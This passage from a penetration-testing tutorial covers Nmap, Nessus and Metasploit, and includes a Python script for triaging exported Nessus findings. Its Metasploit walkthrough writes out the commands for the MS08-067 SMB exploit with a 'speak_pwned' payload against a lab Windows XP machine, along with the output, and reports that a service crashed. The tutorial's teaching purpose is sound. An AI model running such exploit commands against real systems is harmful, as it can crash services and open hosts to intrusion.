A Penetration Tester's Toolkit

Take a look at the report in detail by clicking on the IP in the report. Here you will see a grid broken down by level of concern. As you can see, this very basic vulnerability scan returned a lot of good information. In particular, let's look at the RPC issue. Open that up and take a look at the listing (Figure 7).

Figure 7. A Lot Going on Here for a Fresh Build

What you can take away from this is that RPC is a service of concern and that Nessus by itself has an exploit against it. The plugin ID tells you which plugin to use to test the exploit; the name gives you some detail about the issue, and port and severity are self-explanatory. By clicking on the name, you pull up a window that provides plenty of detail, including what versions are affected, patches released to fix it and various other tidbits (Figure 8).

Figure 8. Detailed Results
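To triage the same fields the grid shows (plugin ID, name, port and severity) outside the Web interface, the following sketch reads an exported report and ranks the findings. It is an added example, not part of the original article or of Nessus itself; it assumes the scan was exported in the .nessus (v2) XML format, and the sample report, plugin IDs, plugin names and function names are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the .nessus (v2) XML export layout. Plugin IDs and
# names are placeholders; the host is the lab VM address used in Listing 2.
SAMPLE_REPORT = """<NessusClientData_v2>
  <Report name="lab-scan">
    <ReportHost name="192.168.56.101">
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4"
                  pluginID="900001" pluginName="Placeholder: Server service RPC flaw">
        <solution>Apply the vendor patch.</solution>
      </ReportItem>
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="2"
                  pluginID="900002" pluginName="Placeholder: SMB signing not required"/>
      <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
                  pluginID="900003" pluginName="Placeholder: OS identification"/>
    </ReportHost>
  </Report>
</NessusClientData_v2>"""

# Assumed severity scale (0-4) as used by recent Nessus versions.
SEVERITY = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

def findings(xml_text, min_severity=1):
    """Return findings at or above min_severity, most severe first."""
    # Parse only exports from your own scanner; for files of unknown origin
    # use a hardened parser such as the third-party defusedxml package.
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.iter("ReportHost"):
        for item in host.iter("ReportItem"):
            sev = int(item.get("severity", "0"))
            if sev >= min_severity:
                rows.append({
                    "host": host.get("name"),
                    "port": f'{item.get("port")}/{item.get("protocol")}',
                    "level": sev,
                    "severity": SEVERITY.get(sev, str(sev)),
                    "plugin_id": item.get("pluginID"),
                    "name": item.get("pluginName"),
                    "solution": (item.findtext("solution") or "").strip(),
                })
    return sorted(rows, key=lambda r: (-r["level"], r["host"], r["port"]))

def worst_by_service(rows):
    """Map (host, port) to its highest severity level and finding count."""
    summary = {}
    for r in rows:
        level, count = summary.get((r["host"], r["port"]), (0, 0))
        summary[(r["host"], r["port"])] = (max(level, r["level"]), count + 1)
    return summary
```

Feeding the result of findings() to worst_by_service() gives one line per host and port, which is a convenient starting point for the patch list in a report.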

This gives us plenty to work with, but let's make sure that we really can exploit this and that there is, indeed, cause for concern. You could do that with Nessus (give it a try!), but rather than relying solely on Nessus, let's bring in the final tool, the heavy-hitter Metasploit.

Why use two different tools that can do the same job? Preference, mostly. I find that Metasploit is much better suited for exploits than Nessus. That's not to say Nessus doesn't get the job done, but Metasploit was built specifically for this purpose. If nothing else, a third tool presents another compelling piece of evidence to support your findings. It never hurts to have an extra set of eyes.

Before going any further, I should say this: I have a ton of respect for the power behind Metasploit. Be sure to read all the documentation before ever attempting a run of Metasploit against a remotely used box. Metasploit is a lot of fun, but kind of in the way that fireworks are a lot of fun (obviously, accidents can happen if you're not careful).

Start by opening a terminal, su to root (if you have given a regular user access to the proper files/directories for Metasploit, it's best to run as said user instead of root), and run the command msfconsole (Figure 9).

Figure 9. Behold, Metasploit

Once you get a prompt back, the first thing to do is select your exploit to test. To see all available exploits, type the following, then go get a cup of coffee, because this takes a minute...or two:


show exploits

Okay, for the purpose of this example, let's use the following command (Figure 10 shows the results), which corresponds to the issue Nessus reported earlier (Figure 8):


use exploit/windows/smb/ms08_067_netapi

Figure 10. Exploits Listed and Exploit Selected

You could use another exploit, which simply would crash the box, but let's try not to be too destructive. With your exploit selected, now you need to choose a payload. A payload is the set of instructions to send via the exploit to get the desired results. In this case, you want to broadcast a message to the computer. First, list your payloads by running the following:


show payloads

Next, select the payload by using the following command:


set payload windows/speak_pwned 

Figure 11. Payload Selected

Finally, show the options for this payload to see what you need to append to this command to run the exploit. In this case, you need to give it the IP of the box in question (which makes sense—Metasploit is not a mind-reading tool). Listing 2 shows the output.

Listing 2. Output of Exploit


msf  exploit(ms08_067_netapi) > set payload windows/speak_pwned 
payload => windows/speak_pwned
msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       Pipe name to use (BROWSER, SRVSVC)


Payload options (windows/speak_pwned):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf  exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf  exploit(ms08_067_netapi) > exploit

[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf  exploit(ms08_067_netapi) > 

As you can see, the exploit completed. And, if you have sound on your virtual machine, you will have heard something to the effect of "pwnd". If you take a look at the Windows machine, you will see that a service crashed in this exploit—a rather typical side effect (Figure 12).

Figure 12. We broke the box.

You could try a few other exploits (actually quite a few), but this gives you a good idea of how something as simple as sending an audible message could cause an issue. Again, be careful, and always play on a test box.

Conclusion

As you can see, these three tools, when used together, make for a powerful investigation and the basis for a good report. Used wisely, these tools can help defend your network against these very exploits. I often find myself simply using Nmap to do random scans on my subnet for new computers, Nessus to investigate further and find vulnerabilities, and Metasploit to disable the device if necessary (it happens more than you think). I also use these tools for generating reports, giving presentations to management and keeping my network healthy in general. I learn something new every time I run them, either about the tools themselves or my network, thus keeping it interesting. Give the tools a try and see what you think and enjoy!

Resources

Nmap: http://nmap.org

Metasploit: http://metasploit.com

Nessus: http://www.nessus.org

______________________

Matthew Agle is a 30-year-old senior architect. When he's not focusing on work, hacking, security, his blog or various other hobbies, he can be found playing with his kids and generally annoying his wife.

Comments

bourne's picture

Very cool article. I have used all these tools (been a while since I used Nessus though). Metasploit is awesome, but can be a little overwhelming to use. Nmap is amazing though and has a lot of great features and can be used for a bunch of different things. Great article, thank you!

UK VPS's picture

Nmap is a great tool for this type of work. Have you had a look at OpenVAS?
I think an article on OpenVAS would be a good follow up.

Thanx

CuisineThai's picture

Thank you for this article. A must read !
I'm not really into networking, so being able to use such tools is very convenient to me :)

Anonymous's picture

Good Article. Should get people interested enough to try these tools out.

As for ease of use, Metasploit also has a good frontend: Armitage.

Anonymous's picture

You're missing The Social-Engineer Toolkit -- One of the best ones out there as well. Good article!

Cool

RonDavidson's picture

This is really highly interesting, I tested this on the hosting account used for my website here and I must say the results were more than surprising. You pointed out a few details I never really cared about much. Really simple if you know the problem, which makes being aware even more important. To sum it up: Thanks :)
